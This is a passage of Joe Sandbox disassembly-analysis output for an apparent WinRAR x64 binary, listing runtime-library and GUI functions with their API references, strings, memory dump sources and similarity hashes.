RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF6C3BB9F0E), ref: 00007FF6C3BBC587

Strings

f, xrefs: 00007FF6C3BBC4B6
csm, xrefs: 00007FF6C3BBC51E

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a6761e8e7c818eeef342585bf932cfb9eaa669016519b3295bdcd8878ab48e67
Instruction ID: a2c91b9e98a48cfc79b345020cb3bafbc82a2a437af95f2274b74f855bc599e5
Opcode Fuzzy Hash: a6761e8e7c818eeef342585bf932cfb9eaa669016519b3295bdcd8878ab48e67
Instruction Fuzzy Hash: A151D432A096028AD714EF15D486E293799FB66B8EF119130DADFAB748DF78F8418740

Function 00007FF6C3BB33EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF6C3BB3444, 00007FF6C3BB34A4
RENAMEDLG, xrefs: 00007FF6C3BB3470

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 7d2f55ecc67719a671fa2d38e6172bed85f8f4a9c20d5812f76a5836ffd50a38
Instruction ID: bc860d8e8de36a7b3fbd08c8919660f2bd9203eed0eb7faf279f54ba921f89a7
Opcode Fuzzy Hash: 7d2f55ecc67719a671fa2d38e6172bed85f8f4a9c20d5812f76a5836ffd50a38
Instruction Fuzzy Hash: 6A210724A0CB4780FA119F58B8869B433A0BF6B78AF400476D9DDEB2A0DF3CE1488740

Function 00007FF6C3BC5E5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6C3BC5E81
GetProcAddress.KERNEL32 ref: 00007FF6C3BC5E97
FreeLibrary.KERNEL32 ref: 00007FF6C3BC5EBE

Strings

mscoree.dll, xrefs: 00007FF6C3BC5E78
CorExitProcess, xrefs: 00007FF6C3BC5E90

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 05444a6bf7ffa3f7416842ed1fa788128f460aa067e84106622d22c8437a5a69
Instruction ID: f7c578738b6d9ed9c0659e19b1899304e24437436c87e48f307a7ce79096ff1f
Opcode Fuzzy Hash: 05444a6bf7ffa3f7416842ed1fa788128f460aa067e84106622d22c8437a5a69
Instruction Fuzzy Hash: ACF0AF31B19A0781EA209F21F446B399720AFAA763F400236C6EED62E8CF3CD044C300

Function 00007FF6C3BA85E8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BAAD40: GetSystemDirectoryW.KERNEL32 ref: 00007FF6C3BAAD8F
Part of subcall function 00007FF6C3BAAD40: LoadLibraryW.KERNEL32 ref: 00007FF6C3BAADF9

GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8615
GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8629

Strings

Crypt32.dll, xrefs: 00007FF6C3BA85F7
CryptProtectMemory, xrefs: 00007FF6C3BA860B
CryptUnprotectMemory, xrefs: 00007FF6C3BA861E

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 4ce61287271f290ba2b07551fa6b18b95ce5e80074612e3ef42cdca0632c0f33
Instruction ID: 36ab894c548681811eff7c4afa85148e1aba315681036307eb8cfcd989017cb1
Opcode Fuzzy Hash: 4ce61287271f290ba2b07551fa6b18b95ce5e80074612e3ef42cdca0632c0f33
Instruction Fuzzy Hash: 38F05865E0AF4681EF018F25E4566642BA0AF3AB4AF484038C9CC96358EF3CD495C340

Function 00007FF6C3BBCA4C Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF6C3BBCB6F
__AdjustPointer.LIBCMT ref: 00007FF6C3BBCBBA

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 36d29e437cc54fc0d0163762a6bd59ee58dd3f3e7b9fd35c41fe11139d6dc90f
Instruction ID: 3a71a46af2df8ffb66ba342fc334ccce9154302b1de0eabea933a4a911eb4722
Opcode Fuzzy Hash: 36d29e437cc54fc0d0163762a6bd59ee58dd3f3e7b9fd35c41fe11139d6dc90f
Instruction Fuzzy Hash: 44B1B621A0DA4A81EA65EF1590C2D396798AF76F8AF094435DECDAF785DF3CF4418380

Function 00007FF6C3BD1028 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6C3BD1050
_set_statfp.LIBCMT ref: 00007FF6C3BD106B
_set_statfp.LIBCMT ref: 00007FF6C3BD1087
_set_statfp.LIBCMT ref: 00007FF6C3BD10C3

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: d1d10107198c09c3932fa6673c1dcca8ef673135442fdb47985b5f68ba886dfb
Instruction ID: 8d37520468f5b6a67a6939b19141191c2a361da1534dce9a7c51be82b46bfba8
Opcode Fuzzy Hash: d1d10107198c09c3932fa6673c1dcca8ef673135442fdb47985b5f68ba886dfb
Instruction Fuzzy Hash: EC11C166E5CA8301F6D46D66F553B750041EF7B372F084634EAEEB62DECE3DA8814280

Function 00007FF6C3BC7520 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC753F
FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC755E
FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC7586
FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC7597
FlsSetValue.KERNEL32(?,?,?,00007FF6C3BBFE57,?,?,00000000,00007FF6C3BC00F2,?,?,?,?,?,00007FF6C3BC007E), ref: 00007FF6C3BC75A8

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a18d1bb93033013d9260a128d3fe553969ba745fda5c1094212dda3b1d87667a
Instruction ID: 01aacf3b026e9aedc096c0310ad81cdd70e835d6d00772053dabe98c8b773352
Opcode Fuzzy Hash: a18d1bb93033013d9260a128d3fe553969ba745fda5c1094212dda3b1d87667a
Instruction Fuzzy Hash: 28117C20F0824206FA68BF25758397D21819FAA3B2F044375E9FEE66C7DF2CE4028300

Function 00007FF6C3BC73B4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6C3BC73C5
FlsSetValue.KERNEL32 ref: 00007FF6C3BC73E4
FlsSetValue.KERNEL32 ref: 00007FF6C3BC740C
FlsSetValue.KERNEL32 ref: 00007FF6C3BC741D
FlsSetValue.KERNEL32 ref: 00007FF6C3BC742E

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1c047d3acce2abe29490f83120ed055b61bd113f0c5f277fa6cfc2aa5ad0cb0e
Instruction ID: afa90bdfbc4608c64c6e75267e175a01641468f9627199a3f5af8b6102a181d6
Opcode Fuzzy Hash: 1c047d3acce2abe29490f83120ed055b61bd113f0c5f277fa6cfc2aa5ad0cb0e
Instruction Fuzzy Hash: 0F111C20B082074AF978BF356453DBD11464FA3373E540775E9FEE62D2EE6CB5028250

Function 00007FF6C3BB71D0 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF6C3BB71ED
GetMessageW.USER32 ref: 00007FF6C3BB7204
TranslateMessage.USER32 ref: 00007FF6C3BB720F
DispatchMessageW.USER32 ref: 00007FF6C3BB721A
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6C3BB45A6), ref: 00007FF6C3BB7228

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: 3637ec5db6395a8c7f011773e1601cf3b2895b5d77d5ad8040c93efe90d32565
Instruction ID: 7cd742ec7cfc5b732def2fcb6b2251ed00439dee62aef7a9a2546e460d65d239
Opcode Fuzzy Hash: 3637ec5db6395a8c7f011773e1601cf3b2895b5d77d5ad8040c93efe90d32565
Instruction Fuzzy Hash: BFF04F29F2844682F7649F24E496E766311EFBAB06F446030E5CE958549E2CD149CB00

Function 00007FF6C3BC5368 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC53A4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC54CE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BC5584

Strings

DXGIDebug.dll, xrefs: 00007FF6C3BC537C

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: DXGIDebug.dll
API String ID: 3215553584-540382549
Opcode ID: 26a2edb9a9702b89a9dfd7e93f4289afa163ffe19e6ccab0517458891712df38
Instruction ID: d0a195cf447803aed82bddfa18737cd3e7c21fbefeb8a5d1f4b61158b251767b
Opcode Fuzzy Hash: 26a2edb9a9702b89a9dfd7e93f4289afa163ffe19e6ccab0517458891712df38
Instruction Fuzzy Hash: CD91D432A0864645F730AE26E652BBD3B95AB62B56F844137DADEE33D5DF3CE4018300

Function 00007FF6C3BBDD6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6C3BBDDDC
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6C3BBDE27

Strings

RCC, xrefs: 00007FF6C3BBDDF8
MOC, xrefs: 00007FF6C3BBDDF0

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 42aad5a187749a9eddd8fae2b3099538122f4e9ac69f397c69f5826ff634bc4b
Instruction ID: bf0dad5107a326d27a150690f5f3aa38236498a276710cf61c27d46b8f668553
Opcode Fuzzy Hash: 42aad5a187749a9eddd8fae2b3099538122f4e9ac69f397c69f5826ff634bc4b
Instruction Fuzzy Hash: 6791BE73A08B818AE710CF65E4916AC7BA0FB56789F14413AEACDAB754DF3CD195CB00

Function 00007FF6C3BBDB50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6C3BBDB9C
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6C3BBDBEB

Strings

RCC, xrefs: 00007FF6C3BBDBB9
MOC, xrefs: 00007FF6C3BBDBB0

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 58744c8bb07ed3aa3e58da5834242c9036a61f7ed2d139103f42bb17746798fd
Instruction ID: e1040eb625a0bb87d7738cacff27d14e85c4b353fc664fbb4ed6668aa6e15e20
Opcode Fuzzy Hash: 58744c8bb07ed3aa3e58da5834242c9036a61f7ed2d139103f42bb17746798fd
Instruction Fuzzy Hash: 5A615B36A08A858AE720CF65D0817AD77A0F755B8DF044229EECD6BB99CF7CE195C700

Function 00007FF6C3BBE2E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6C3BBE308
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6C3BBE3F0

Strings

csm, xrefs: 00007FF6C3BBE442
csm, xrefs: 00007FF6C3BBE32A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: dff33faf19fa612d00f694886be567677f5714d100c4dc190a560424eb284a65
Instruction ID: c21db63c6ff209bba70557490b0a55446cba1d4c569312a286129f1b43605c7f
Opcode Fuzzy Hash: dff33faf19fa612d00f694886be567677f5714d100c4dc190a560424eb284a65
Instruction Fuzzy Hash: 3951963290824286EB648F15A4C5A6C7790FBA6B8EF144135FACD9B7E5CF3CE4508700

Function 00007FF6C3BB0990 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FF6C3BB09D9
RegisterClassExW.USER32 ref: 00007FF6C3BB0A04

Strings

RarHtmlClassName, xrefs: 00007FF6C3BB09F4
P, xrefs: 00007FF6C3BB09CB

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P$RarHtmlClassName
API String ID: 1693014935-552670043
Opcode ID: 31acbb7b32b518cdaa092c4f1bb6aab95ae06e0d4904f27a47475fa26f19002a
Instruction ID: 730da9c73d689c9aab2664d55aaa7af8518ef287a67b009c8a676dabf85c6f3f
Opcode Fuzzy Hash: 31acbb7b32b518cdaa092c4f1bb6aab95ae06e0d4904f27a47475fa26f19002a
Instruction Fuzzy Hash: 0D013532E14B42CAF7008FA0E8457AD37B8F758759F244138DE986AA18DF788155CB80

Function 00007FF6C3BB1CA4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6C3BB1CB0
GetDeviceCaps.GDI32 ref: 00007FF6C3BB1CC1
ReleaseDC.USER32 ref: 00007FF6C3BB1CCE

Strings

, xrefs: 00007FF6C3BB1CD4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: 3835359f8632c3883978aa59da59803a7ae97ae479bf7427c32fe4182829fb3b
Instruction ID: 6e4a3037ada7a0ddd18fa2251ac2d38215c480d5440c489bcee001773ff12380
Opcode Fuzzy Hash: 3835359f8632c3883978aa59da59803a7ae97ae479bf7427c32fe4182829fb3b
Instruction Fuzzy Hash: 9BE0C228B0864182EB0C6BBEF58A83A6361AB4DBD1F166034DA8F83784CE3DD4C44B00

Function 00007FF6C3BCEF38 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6C3BCEFB7
WriteFile.KERNEL32 ref: 00007FF6C3BCF27F
WriteFile.KERNEL32 ref: 00007FF6C3BCF2C5
GetLastError.KERNEL32 ref: 00007FF6C3BCF37B

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: a8e3eefb6b4a7bb60a8dfef776a41c730d8024edca4d5e0d56e7037e71f64804
Instruction ID: 484225a869ee53cdddfeab911b86e78b9d8b34557171e0ff8e7eafb88376478b
Opcode Fuzzy Hash: a8e3eefb6b4a7bb60a8dfef776a41c730d8024edca4d5e0d56e7037e71f64804
Instruction Fuzzy Hash: F4D12432F08A8189E720DF65E4416AC37B1FB66799B144276DEDDEBB89DE38D506C300

Function 00007FF6C3BCF860 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6C3BCF84B,00000000), ref: 00007FF6C3BCF97C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6C3BCF84B,00000000), ref: 00007FF6C3BCFA07

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
